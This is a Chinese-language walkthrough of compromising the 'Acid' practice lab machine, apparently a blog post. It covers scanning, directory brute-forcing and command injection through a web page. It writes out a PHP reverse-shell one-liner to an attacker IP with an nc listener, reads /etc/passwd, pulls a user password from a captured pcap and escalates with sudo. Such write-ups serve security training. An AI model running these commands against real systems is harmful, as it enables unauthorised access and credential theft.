靶机练习(Acid)

信息收集

主机发现

靶机练习(Acid)_第1张图片

端口扫描

靶机练习(Acid)_第2张图片

开放的端口为3347

浏览器访问

靶机练习(Acid)_第3张图片

查看源码

最下面有一串字符

靶机练习(Acid)_第4张图片

看来是让我们访问这个图片

靶机练习(Acid)_第5张图片

下载查看这个图片,用hexdump查看,可以看到最后有一串字符,还不清楚它的用途

37:61:65:65:30:66:36:64:35:38:38:65:64:39:39:30:35:65:65:33:37:66:31:36:61:37:63:36:31:30:64:34

靶机练习(Acid)_第6张图片

靶机练习(Acid)_第7张图片

靶机练习(Acid)_第8张图片

靶机练习(Acid)_第9张图片

目录爆破

使用dirbuster 爆目录

靶机练习(Acid)_第10张图片

分别访问include.php、cake.php、hacked.php

靶机练习(Acid)_第11张图片

靶机练习(Acid)_第12张图片

这个应该是登陆后才能访问,它显示有Magic_Box文件夹

靶机练习(Acid)_第13张图片

发现这个页面可以输入命令

靶机练习(Acid)_第14张图片

靶机练习(Acid)_第15张图片

反弹Shell

尝试写一个shell

root@kali:~# nc -lvnp 4444

php -r '$sock=fsockopen("192.168.110.129",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

url编码后发送

靶机练习(Acid)_第16张图片

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ su

su: must be run from a terminal

提示需要一个终端

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@acid:/var/www/html/Challenge/Magic_Box$

查看有哪些用户 cat /etc/passwd

acidsaman

查看用户文件

find / -user acid 2>/dev/null

/sbin/raw_vs_isi/hint.pcapng 是一个流量包,我们下载分析一波

靶机练习(Acid)_第17张图片

scp /sbin/raw_vs_isi/hint.pcapng [email protected]:/root/

靶机练习(Acid)_第18张图片

在数据包中我们找到了saman用户的密码:1337hax0r

靶机练习(Acid)_第19张图片

GETFLAG

先登陆saman用户

sudo -i: 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为"#"而不是"$"。想退回普通账户时可以执行"exit""logout"

sudo -i

靶机练习(Acid)_第20张图片

出现的问题:

1dirbuster使用不熟练没有扫出和参考一至的内容一度陷入抓狂状态

2ssh远程传输文件因未安装ssh_server和未设置允许root账户连接而失败

反思:

1、工具一定要勤用,多试试其他方式

2、Linux的相关命令熟练程度有待提高

你可能感兴趣的:(靶机练习(Acid))